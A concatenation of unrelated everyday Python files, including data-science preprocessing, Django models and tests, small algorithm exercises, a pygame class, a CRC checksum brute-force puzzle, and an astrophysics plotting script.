"length between 8-20.\nIf it is a phrase it must be separated by spaces.\n"
" If the phrase is longer than the length then it will not be shortened.\n\nBy default it will "
"use special characters and randomly make some characters uppercase. To leave selection blank just press enter\n")
words = input("Enter a word or phrase (leave blank for random): ")
while True: # this while will check that the length is a number and less than 20 or ask for confirmation
pLength = input("Length of password: ")
if pLength == "":
pLength = 0
break
try:
pLength = int(pLength)
if pLength > 20:
answer = input("Are you sure? (y/n)")
if answer.lower() == "y":
break
else:
break
continue
except:
print("Please enter a number")
print("Password: ", generatePassword(words, pLength))
|
# -*- coding: UTF-8 -*-
import numpy as np
import pandas as pd
train_data = pd.read_csv("train.csv", header=0, delimiter=',')
test_data = pd.read_csv("test.csv", header=0, delimiter=',')
result = pd.read_csv("gender_submission.csv", header=0, delimiter=',')
result = result['Survived']
class Datasets:
def __init__(self, data, is_training):
self.df = self.preprocess(data)
if is_training:
#self.df = self.oversampling(self.df)
self.labels = self.df['Survived']
self.df = self.df.iloc[:, 1:]
self.num_examples = len(self.df)
self.pos = 0
def oversampling(self, data):
pos = data[data['Survived'] == 1]
neg = data[data['Survived'] == 0]
n_pos = len(pos)
n_neg = len(neg)
if n_pos > n_neg:
neg = pd.concat([neg, neg.sample(n=n_pos-n_neg, replace=True)])
else:
pos = pd.concat([pos, pos.sample(n=n_neg - n_pos, replace=True)])
data = pd.concat([neg, pos])
return data
def preprocess(self, data):
data = data.drop(labels=['Cabin', 'PassengerId', 'Ticket', 'Name'], axis=1)
data['Sex'][data['Sex'] == 'male'] = 0
data['Sex'][data['Sex'] == 'female'] = 1
# data format
data = pd.concat([data, pd.get_dummies(data['Embarked'], prefix='Embarked')], axis=1)
data = pd.concat([data, pd.get_dummies(data['Pclass'], prefix='Pclass')], axis=1)
data = data.drop(labels=['Embarked', 'Pclass'], axis=1)
# fill null nan
for x in data.columns:
data[x][data[x].isnull()] = data[x].median()
data['Age'][data['Age'] < 15.0] = 0
data['Age'][data['Age'] >= 15.0] = 1
return data
def next_batch(self, batch_size):
features = self.df.iloc[self.pos:self.pos+batch_size, :]
labels = self.labels[self.pos:self.pos+batch_size]
self.pos += batch_size
if self.pos >= self.num_examples:
self.pos = 0
return features, labels
def train_test_feature_equal(train, test):
for x in train.columns:
if x in test.columns:
pass
else:
if x!='Survived':
train = train.drop(x, axis=1)
return train, test
train_data, test_data = train_test_feature_equal(train_data, test_data)
train_div = int(len(train_data)*0.2)
train = Datasets(train_data.iloc[train_div:, :], True)
validation = Datasets(train_data.iloc[:train_div, :], True)
test = Datasets(test_data, False)
|
import logging
import os
import shutil
from pathlib import Path
import tempfile
import pandas as pd
from autumn.core import db, plots
from autumn.settings import REMOTE_BASE_DIR
from autumn.infrastructure.tasks.utils import get_project_from_run_id
from autumn.core.utils.s3 import download_from_run_s3, list_s3, upload_to_run_s3, get_s3_client
from autumn.core.utils.timer import Timer
from .storage import StorageMode, MockStorage, S3Storage, LocalStorage
from autumn.core.runs import ManagedRun
logger = logging.getLogger(__name__)
def powerbi_task(run_id: str, urunid: str, quiet: bool, store="s3"):
REMOTE_BASE_DIR = Path(tempfile.mkdtemp())
POWERBI_PLOT_DIR = os.path.join(REMOTE_BASE_DIR, "plots", "uncertainty")
POWERBI_DATA_DIR = os.path.join(REMOTE_BASE_DIR, "data", "powerbi")
POWERBI_DIRS = [POWERBI_DATA_DIR, POWERBI_PLOT_DIR]
POWERBI_PRUNED_DIR = os.path.join(POWERBI_DATA_DIR, "pruned")
POWERBI_COLLATED_PATH = os.path.join(POWERBI_DATA_DIR, "collated")
POWERBI_COLLATED_PRUNED_PATH = os.path.join(POWERBI_DATA_DIR, "collated-pruned")
s3_client = get_s3_client()
project = get_project_from_run_id(run_id)
# Set up directories for plots and output data.
with Timer(f"Creating PowerBI directories"):
for dirpath in POWERBI_DIRS:
if os.path.exists(dirpath):
shutil.rmtree(dirpath)
os.makedirs(dirpath)
mr = ManagedRun(run_id, s3_client=s3_client)
if store == StorageMode.MOCK:
storage = MockStorage()
elif store == StorageMode.S3:
s3_client = get_s3_client()
storage = S3Storage(s3_client, run_id, REMOTE_BASE_DIR, not quiet)
elif store == StorageMode.LOCAL:
storage = LocalStorage(run_id, REMOTE_BASE_DIR)
# Find the full model run databases in AWS S3.
# key_prefix = os.path.join(run_id, os.path.relpath(FULL_RUN_DATA_DIR, REMOTE_BASE_DIR))
# chain_db_keys = []
# for filename_base in ["mcmc_run", "mcmc_params", "derived_outputs"]:
# chain_db_keys += list_s3(s3_client, key_prefix, key_suffix=f"{filename_base}.feather")
# Download the full model run databases.
# with Timer(f"Downloading full model run data"):
# for src_key in chain_db_keys:
# download_from_run_s3(s3_client, run_id, src_key, quiet)
# No urunid supplied; get a single candidate dataframe (ie the MLE run)
if urunid == "mle":
all_mcmc_df = mr.full_run.get_mcmc_runs()
candidates_df = db.process.select_pruning_candidates(all_mcmc_df, 1)
else:
c, r = (int(x) for x in urunid.split("_"))
candidates_df = pd.DataFrame(columns=["chain", "run"])
candidates_df.loc[0] = dict(chain=c, run=r)
# Remove unnecessary data from each full model run database.
full_db_paths = db.load.find_db_paths(mr.full_run.local_path)
with Timer(f"Pruning chain databases"):
get_dest_path = lambda p: os.path.join(POWERBI_PRUNED_DIR, os.path.basename(p))
for full_db_path in full_db_paths:
chain_id = int(full_db_path.split("-")[-1])
chain_candidates = candidates_df[candidates_df["chain"] == chain_id]
db.process.prune_chain(full_db_path, get_dest_path(full_db_path), chain_candidates)
# Collate data from each pruned full model run database into a single database.
pruned_db_paths = db.load.find_db_paths(POWERBI_PRUNED_DIR)
with Timer(f"Collating pruned databases"):
db.process.collate_databases(pruned_db_paths, POWERBI_COLLATED_PATH)
# Calculate uncertainty for model outputs.
with Timer(f"Calculating uncertainty quartiles"):
db.uncertainty.add_uncertainty_quantiles(POWERBI_COLLATED_PATH, project.plots)
# Remove unnecessary data from the database.
with Timer(f"Pruning final database"):
db.process.prune_final(POWERBI_COLLATED_PATH, POWERBI_COLLATED_PRUNED_PATH, candidates_df)
# Unpivot database tables so that they're easier to process in PowerBI.
run_slug = run_id.replace("/", "-")
dest_db_path = os.path.join(POWERBI_DATA_DIR, f"powerbi-{run_slug}.db")
with Timer(f"Applying PowerBI specific post-processing final database"):
db.process.powerbi_postprocess(POWERBI_COLLATED_PRUNED_PATH, dest_db_path, run_id)
# Upload final database to AWS S3
with Timer(f"Uploading PowerBI data to AWS S3"):
# upload_to_run_s3(s3_client, run_id, dest_db_path, quiet)
storage.store(dest_db_path)
# Create uncertainty plots
with Timer(f"Creating uncertainty plots"):
plots.uncertainty.plot_uncertainty(project.plots, dest_db_path, POWERBI_PLOT_DIR)
# Upload the plots to AWS S3.
with Timer(f"Uploading plots to AWS S3"):
# upload_to_run_s3(s3_client, run_id, POWERBI_PLOT_DIR, quiet)
storage.store(POWERBI_PLOT_DIR)
shutil.rmtree(REMOTE_BASE_DIR)
|
from django.db import models
class Pizza(models.Model):
name = models.TextField(max_length=50)
def __str__(self):
if len(self.name) > 20:
return self.name[:20] + ...
else:
return self.name
class Topping(models.Model):
name = models.TextField(max_length=50)
pizza = models.ForeignKey(Pizza, on_delete=models.CASCADE)
def __str__(self):
if len(self.name) > 20:
return self.name[:20] + ...
else:
return self.name
|
from selenium import webdriver
browser = webdriver.Chrome()
browser.get('http://inventwithpython.com')
head = browser.find_element_by_id('headerimage')
linkr = head.get_attribute('alt')
print(linkr)
#browser.close()
|
from django.dispatch import receiver
from bifrost.signals import init_service
from bifrost.src.ioc.ServiceContainer import Container
from bifrost_location.Services import Location
@receiver(init_service)
def declare_services(sender, **kwargs):
Container.set_service('location_service', Location.Service)
|
import pytest
from django.test import TestCase, override_settings
from .utils import MIDDLEWARES_FOR_TESTING
class TestResponseFunctionWithoutUser(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/restframework/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/restframework/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/restframework/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/restframework/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/restframework/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/restframework/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestResponseFunctionWithUser(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/restframework/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/restframework/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/restframework/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/restframework/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/restframework/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/restframework/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
class TestResponseClassWithoutUser(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/restframework/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/restframework/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/restframework/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/restframework/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestResponseClassWithUser(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/restframework/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/restframework/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/restframework/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/restframework/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
|
import crc
from itertools import chain, product
HEX_STRIP = [hex(i)[2:] for i in range(0, 16)]
CRC_TARGET = '4930'
FORMATTED_PARTIAL_INPUT = '1b{}beaf'
BLANK_MIN_LEN = 4
BLANK_MAX_LEN = 4
def bruteforce(strip, min_length, max_length):
"""
returns all options of the strip characters in required length
:param strip: list of relevant characters
:param min_length: the minimum length of string to be returned
:param max_length: the maximum length of string to be returned
:return: generator of all options
"""
return (''.join(char) for char in chain.from_iterable(product(strip, repeat=x)
for x in range(min_length, max_length+1)))
cac16a = crc.CrcModel(16, "CRC16_A", 0x1021, 0xC6C6, 0x0000, True, True, True)
for option in bruteforce(HEX_STRIP, BLANK_MIN_LEN, BLANK_MAX_LEN):
input_bytes = FORMATTED_PARTIAL_INPUT.format(option)
crc_res = cac16a.compute(input_bytes)
if crc_res == CRC_TARGET:
print 'The correct option is: {}, partial input: {}.\r\nfull content: {} equal to the target crc: {}.'.format(
option, FORMATTED_PARTIAL_INPUT, input_bytes, CRC_TARGET)
|
import pygame
from config import (
PLAYER_IMAGE,
PLAYER_SIZE,
PLAYER_HP,
PLAYER_POSITION,
PLAYER_SPEED,
PLAYER_FIRE_CADENCE,
PLAYER_BULLET_LINES,
PLAYER_BULLET_SPEED,
PLAYER_BULLET_SIZE
)
from Entity import Entity
from Bullet import Bullet
class Player(Entity):
def __init__(self, screen, position=PLAYER_POSITION, size=PLAYER_SIZE, speed=PLAYER_SPEED, fire_cadence=PLAYER_FIRE_CADENCE, image_file=PLAYER_IMAGE):
super().__init__(position, size, image_file)
self.screen = screen
self.speed = speed
self.bullets = []
self.powerups = []
self.bullet_lines = PLAYER_BULLET_LINES
self.fire_cadence = fire_cadence
self.last_shot = pygame.time.get_ticks()
self.hp = PLAYER_HP
self.last_damage = pygame.time.get_ticks()
self.invencible = False
def move(self, keys):
if (keys[pygame.K_w] or keys[pygame.K_UP]) and self.rect.top > -self.height / 2:
self.rect.top -= self.speed
if (keys[pygame.K_s] or keys[pygame.K_DOWN]) and self.rect.top < self.screen.get_height() - self.height / 2:
self.rect.top += self.speed
if (keys[pygame.K_a] or keys[pygame.K_LEFT]) and self.rect.left > -self.width / 2:
self.rect.left -= self.speed
if (keys[pygame.K_d] or keys[pygame.K_RIGHT]) and self.rect.left < self.screen.get_width() - self.width / 2:
self.rect.left += self.speed
def shoot(self):
now = pygame.time.get_ticks()
if now - self.last_shot > self.fire_cadence:
self.last_shot = now
bullet_x_pos = [
[self.rect.left + self.width / 2],
[self.rect.left + 20, self.rect.left + self.width - 20],
[self.rect.left + 5, self.rect.left + self.width / 2, self.rect.left + self.width - 5]
]
bullet_y_pos = self.rect.top + self.height / 2
for i in range(self.bullet_lines):
if self.bullet_lines == 3:
if i == 1:
bullet_y_pos -= 30
else:
bullet_y_pos += 30
b = Bullet(
[bullet_x_pos[self.bullet_lines - 1][i], bullet_y_pos],
PLAYER_BULLET_SIZE,
PLAYER_BULLET_SPEED,
Player
)
self.bullets.append(b)
def handle_hp(self, quantity=-1) -> int:
now = pygame.time.get_ticks()
if quantity < 0:
if now - self.last_damage > 1000 or self.hp == PLAYER_HP:
self.last_damage = now
self.hp += quantity
self.invencible = True
else:
self.hp += quantity
return self.hp
def update(self):
now = pygame.time.get_ticks()
image = self.image
rect = self.rect
if self.invencible and now - self.last_damage < 1000:
image = pygame.image.load('assets/spaceshipdamaged.png')
image = pygame.transform.scale(image, self.size)
rect = image.get_rect()
self.screen.blit(image, (self.rect.left, self.rect.top)) |
# Generated by Django 3.1.1 on 2020-11-27 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0012_post_etime'),
]
operations = [
migrations.AlterField(
model_name='post',
name='event',
field=models.CharField(max_length=100, unique=True),
),
]
|
# Binary search
#http://rosalind.info/problems/bins/
n = 5
m = 6
A = [10, 20, 30, 40, 50]
K = [40, 10, 35, 15, 40, 20]
# Parsing from file:
with open('rosalind_bins.txt', 'r') as contents:
n,m,A,K = contents.read().strip().split('\n')
A = [int(a) for a in A.split(' ')]
K = [int(k) for k in K.split(' ')]
def binarySearch(arr, key, start, finish):
mid = (start + finish)/2
# can't find it
if mid == start:
return -1
#found it
elif arr[mid] == key:
return mid
#keep looking
else:
if arr[mid] > key:
return binarySearch(arr, key, start, mid)
else:
return binarySearch(arr, key, mid, finish)
def getSearchIndices(arr, keys):
indices = []
n = len(arr)
for k in keys:
indices.append(binarySearch(arr, k, 0, n))
return map(lambda x: x + 1 if x >= 0 else -1, indices)
indices = getSearchIndices(A, K)
#print indices
with open('bins_output.txt', 'w') as dump:
dump.write(' '.join([str(i) for i in indices]))
|
#!/usr/bin/env python3
from ObliviousTransfer import One_out_of_Two
alice = One_out_of_Two(client=False)
alice.verbose = True
alice.store_secret("A", "Some description")
alice.store_secret("B", "Another description")
alice.show_secrets()
alice.start() |
# -*- coding: utf-8 -*-
"""
The :mod:`.utility` module has several functions that support celloracle.
"""
from .make_log import makelog
from .utility import (save_as_pickled_object, load_pickled_object,
intersect,
exec_process,
standard, inverse_dictionary,
adata_to_color_dict,
transfer_all_colors_between_anndata,
transfer_color_between_anndata,
knn_data_transferer,
update_adata)
from .load_hdf5 import load_hdf5
from .pandas_utility_for_jupyternotebook import init_datatable_mode
from .package_version_checker import check_python_requirements
__all__ = [
"makelog",
"save_as_pickled_object",
"load_pickled_object",
"intersect",
"exec_process",
"standard",
"load_hdf5",
"inverse_dictionary"
"adata_to_color_dict",
"transfer_all_colors_between_anndata",
"transfer_color_between_anndata",
"knn_data_transferer",
"update_adata"
]
|
import waveletsim_53 as dwt
im = dwt.Image.open("../lena_512.png")
pix = im.load()
m = list(im.getdata())
#print m.__sizeof__()
m = [m[i:i+im.size[0]] for i in range(0, len(m), im.size[0])]
#m_orig = copy.deepcopy(m)
#m_orig[0][0]=300
#print m_orig[0][0], m[0][0]
#print len(m_orig[0]), len(m_orig[1])
#print m.__sizeof__()
#print len(m[0]), len(m[1])
"""Converts the 16bit to list m[row][col] this is the procedure that will be needed in the FPGA"""
#convert_intelhex_to_list()
#print m[0][0].__sizeof__()
m = dwt.fwt97_2d(m, 1)
# Convert the list of lists matrix to an image.
dwt.seq_to_img(m, pix)
#convert_list_to_bin()
# Save the transformed image.
im.save("test1_512_fwt.png")
w, h = im.size
m = dwt.upper_lower(m, w, h)
#mm = copy.deepcopy(m)
m = dwt.iwt97_2d(m, 1)
dwt.seq_to_img(m, pix)
#mm_1lvl = copy.deepcopy(mm)
im.save("test1_512_iwt.png")
'''
for i in range(512):
for j in range(512):
diff = m_orig[j][i] - mm_1lvl[j][i]
if (diff != 0):
print "i", i,"j",j,"diff", diff,"orig", m_orig[j][i] , "fwd/inv",mm_1lvl[j][i]
'''
|
#prime factorization using seive()
#find smallest prime factor(spf) for everynumber using seive()
#and recursively divide the number with this SPF and add to prime list
import math
def smallest_prime_factor(limit):
spf=[0]*(limit+1)
spf[1]=1
#smallest prime factor for every even number is 2
for j in range(2,limit+1):
spf[j]=2
for i in range(3,limit+1,2):
spf[i]=i
#for odd.
for k in range(3,math.ceil(math.sqrt(limit+1)),2):
if spf[k]==k:
for j in range(k*k,limit+1,k):
if spf[j]>k:
spf[j]=k
return spf
def prime_factors_of_number(n):
spf=smallest_prime_factor(n)
ans=[]
while n!=1:
ans.append(spf[n])
n=n//spf[n]
return ans
print(prime_factors_of_number(12246))
#2 3 13 157
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def subtreeWithAllDeepest(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
if root == None:
return None
needed = [root]
temp = set()
while len(needed) > 0:
temp = set(needed.copy())
length = len(needed)
for _ in range(length):
node = needed.pop(0)
if node.left:
needed.append(node.left)
if node.right:
needed.append(node.right)
count = [0]
def traverse(node):
if not node:
return []
else:
lr = traverse(node.left)
rr = traverse(node.right)
if isinstance(lr, TreeNode):
return lr
if isinstance(rr, TreeNode):
return rr
this_layer = [node]+lr+rr
if temp.issubset(this_layer):
return node
else:
return this_layer
return traverse(root)
# a = TreeNode(1)
# b = TreeNode(2)
# c = TreeNode(3)
# d = TreeNode(4)
# e = TreeNode(5)
# f = TreeNode(6)
# a.left = b
# a.right = c
# b.left = d
# b.right = e
# c.right = f
# print(Solution().subtreeWithAllDeepest(a).val) |
from samson_const import *
from pathloc import *
import matplotlib as mpl
mpl.use('Agg')
from readsnap_cr import readsnapcr
import Sasha_functions as SF
import graphics_library as GL
import gas_temperature as GT
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
from samson_functions import *
from crtestfunction import *
from matplotlib import rcParams
from pylab import *
from textwrap import wrap
from scipy.optimize import curve_fit
#rcParams['figure.figsize'] = 5, 5
rcParams['figure.figsize'] = 10, 5
rcParams['font.size']=12
rcParams['font.family']='serif'
rcParams['text.usetex']=True
#rcParams.update({'figure.autolayout': True})
import matplotlib.patches as patches
rcParams['axes.linewidth'] = 2
rcParams['pdf.fonttype'] = 42
rcParams['ps.fonttype'] = 42
rcParams['ps.useafm'] = True
rcParams['pdf.use14corefonts'] = True
rcParams['axes.unicode_minus']=False
colortable = [ 'b', 'g', 'r']
dirneed=['bwsmclrdc0','bwsmclrdc27','bwsmclrdc28','bwsmclrdc29','bwsmclrstr','bwsmclrdc28mhd','bwsmclrdc28str',\
'bwmwmrdc0','bwmwmrdc27','bwmwmrdc28', 'bwmwmrdc29','bwmwmrstr','bwmwmrdc28mhd','bwmwmrdc28str',\
'bwsbclrdc0','bwsbclrdc27', 'bwsbclrdc28','bwsbclrdc29','bwsbclrstr','bwsbclrdc28mhd','bwsbclrdc28str']
fmeat=dirneed[-1]
startno=400
Nsnap=501
snapsep=10
wanted='SFRLg'
title='MW'
ptitle='LSG'
nolegend=0
convertfromChabtoKrou=1 #conversion according to Crain 2010 and Hayward 2014
print 'wanted', wanted
print 'fmeat', fmeat
print 'runtodo', dirneed
if wanted=='SFRLg':
import time
rcParams['figure.figsize'] = 6,6
varR = 0
sepave=0
useFcal=1
atstarburst=1
sbgassurmin=0.08
newlabelneed=1
if varR==1:
radgas=0.0
else:
radgas=1.0 #kpc
Rfrac=0.03
for runtodo in dirneed:
gassurl=[]
gassurxl=[]
gassuryl=[]
gassurzl=[]
info=outdirname(runtodo, Nsnap)
havecr=info['havecr']
dclabel=info['dclabel']
runtitle=info['runtitle']
print 'havecr', havecr
print 'runtitle', runtitle
haveB=info['haveB']
cosmo=info['cosmo']
color=info['color']
correctIa=info['correctIa']
if havecr==0:
continue
runtitle=info['runtitle']
newlabel=info['newlabel']
starburst=0
shiftz=0
mks=10
pstartno = startno
pNsnap = Nsnap
psnapsep = snapsep
crshiftz=1
marker='^'
if runtitle=='SMC':
physicalR=3.0
shiftz=1
marker='o'
radgas=2.0
elif runtitle=='MW':
physicalR=10.0
shiftz=1
marker='^'
mks=14
radgas=4.0
elif runtitle=='SBC':
physicalR=10.0
starburst=1
pstartno=300
pNsnap=600
psnapsep=5
radgas=0.25
if atstarburst==1:
psnapsep=1
if runtodo=='bwsbclr':
pNsnap=528
pstartno=518
if runtodo=='bwsbclrdc0':
pNsnap=594
pstartno=584
if runtodo=='bwsbclrdc27':
pNsnap=143
pstartno=133
if runtodo=='bwsbclrdc28':
pNsnap=525
pstartno=515
if runtodo=='bwsbclrdc29':
pNsnap=438
pstartno=428
if runtodo=='bwsbclrstr':
pNsnap=250
pstartno=240
if runtodo=='bwsbclrdc28mhd':
pNsnap=563
pstartno=553
if runtodo=='bwsbclrdc28str':
pNsnap=375
pstartno=365
shiftz=1
marker='D'
if cosmo == 1:
physicalR=6.0
if runtodo=='m10qcr_b_70':
physicalR=3.0
outdata = dirout(runtodo,pstartno,pNsnap,psnapsep, Rfrac,physicalR=physicalR,shiftz=crshiftz)
avesfrl = outdata['avesfrl']
Lsfr = outdata['Lsfr']
if havecr>4:
Lgamma_sfr=outdata['Lgamma_sfr']
Lgamma = outdata['Lgamma']
elif havecr>0:
Lgamma_sfr=outdata['Lgcal_sfr']
Lgamma = outdata['Lgcal']
if useFcal==1:
Lgamma_sfr=outdata['Lgcal_sfr']
Lgamma = outdata['Lgcal']
if correctIa==1 and havecr>0:
Lgamma_sfr=outdata['Lgamma_sfr_noIa']
print 'Lgamma_sfr', Lgamma_sfr
Lgamma_sfr = Lgamma_sfr[np.isfinite(Lgamma_sfr)]
#if starburst==1:
# sfrcut=avesfrl>6.0
# Lgamma_sfr=Lgamma_sfr[sfrcut]
print 'Lgamma_sfr', Lgamma_sfr
if len(Lgamma_sfr)==0:
continue
labelneed=dclabel
if newlabelneed==1:
labelneed="\n".join(wrap(newlabel,17))
print 'labelneed', labelneed
if haveB>0:
#if runtodo=='bwmwmrdc28mhd' or runtodo=='bwsmclrdc28mhd' or runtodo=='bwsbclrdc28mhd':
fillstyle='none'
else:
fillstyle='full'
if not ( runtitle=='MW' or runtitle=='COSMO'):
labelneed=''
if starburst==1:
avesfrold = avesfrl
sfrcut=avesfrold>3.0
avesfrl = avesfrl[sfrcut]
Lgamma=Lgamma[:-1]
Lgamma = Lgamma[sfrcut]
SFRmed = np.median(avesfrl)
SFR1sigu = np.percentile(avesfrl,84)-SFRmed
SFR1sigd = SFRmed-np.percentile(avesfrl,15.8)
Lmed = np.median(Lgamma)
L1sigu = np.percentile(Lgamma,84)-Lmed
L1sigd = Lmed-np.percentile(Lgamma,15.8)
print 'SFRmed, Lmed', SFRmed, Lmed
plt.errorbar(SFRmed, Lmed, xerr=[[SFR1sigd],[SFR1sigu]], yerr=[[L1sigd],[L1sigu]]\
,color=color,fmt=marker,markersize=7,label=labelneed, fillstyle=fillstyle)
# obsdatal = [[0.2,0.2,0.2,1.7e37,1.3e37,2.1e37]\
#LMC
# ,[0.068,0.036,0.1,4.3e36,4.3e36,4.3e36]\
#SMC
# ,[2.0,1.2,3.4,6.5e38,6.5e38,6.5e38]\
#MW
# ,[1.0,1.0,1.0,1.9e38,1.5e38,2.3e38]\
#M31
# ,[6.18,6.18,6.18,2e40,1.6e40,2.4e40]\
#M82
# ,[2.82,2.82,2.82,9.5e39,6.0e39,14.0e39]\
#NGC253
# ,[3.49,3.49,3.49,1.7e40,1.2e40,2.2e40]\
#NGC4945
# ,[37,37,37,8e40,6e40,10e40]]
#NGC1068
obsdatal = [[0.2,0.2,0.2,1.7e37,1.3e37,2.1e37]\
#LMC
,[0.068,0.036,0.1,4.3e36,4.3e36,4.3e36]\
#SMC
,[2.0,1.2,3.4,6.5e38,6.5e38,6.5e38]\
#MW
,[1.0,1.0,1.0,1.9e38,1.5e38,2.3e38]\
#M31
,[7.83,7.83,7.83,2e40,1.6e40,2.4e40]\
#M82
,[4.66,4.66,4.66,9.5e39,6.0e39,14.0e39]\
#NGC253
,[4.00,4.00,4.00,1.7e40,1.2e40,2.2e40]\
#NGC4945
,[24.74,24.74,24.74,8e40,6e40,10e40]]
#NGC1068
ftxt = open(programdir+'/data/nondetectGammaray.txt', 'r')
ftxt.readline()
dars = ftxt.readlines()
ftxt.close()
SFRlnd=[]
LGRl=[]
for line in dars:
xsd = line.split()
if convertfromChabtoKrou==1: #conversion according to Crain 2010 and Hayward 2014
SFRlnd =np.append(SFRlnd, float(xsd[0])/0.79/1.5)
LGRl=np.append(LGRl, float(xsd[1]))
#plt.plot(np.power(10.,SFRlnd),np.power(10.,LGRl),markersize=4,mfc='None'\
# ,markeredgecolor='red', marker='s',ls='None')
for data in obsdatal:
plt.errorbar(data[0], data[3],\
xerr=[[data[0]-data[1]],[data[2]-data[0]]],\
yerr=[[data[3]-data[4]],[data[5]-data[3]]],\
fmt='s', color='0.5',ls='dashed', mfc='0.9',markersize=6)
# ndpoint = plt.errorbar([],[], fmt='s', color='red', mfc='None',markersize=6)
obsbar = plt.errorbar([],[], fmt='s', color='0.5', mfc='0.9',markersize=6)
dwarfpoint = plt.errorbar([],[], fmt='o', color='g', mfc='g',markersize=6)
lstarpoint = plt.errorbar([],[], fmt='^', color='g', mfc='g',markersize=6)
sbpoint = plt.errorbar([],[], fmt='D', color='g', mfc='g',markersize=6)
import matplotlib.lines as mlines
calline = mlines.Line2D([], [], color='k', ls='dashed')
lxlist = [obsbar,dwarfpoint,lstarpoint,sbpoint,calline]
# dclablist = ['Non detection','Observations','Dwarf',r'L$\star$ Galaxy', 'Starburst']
dclablist = ['Observations','Dwarf',r'L$\star$ Galaxy', 'Starburst','Calorimetric']
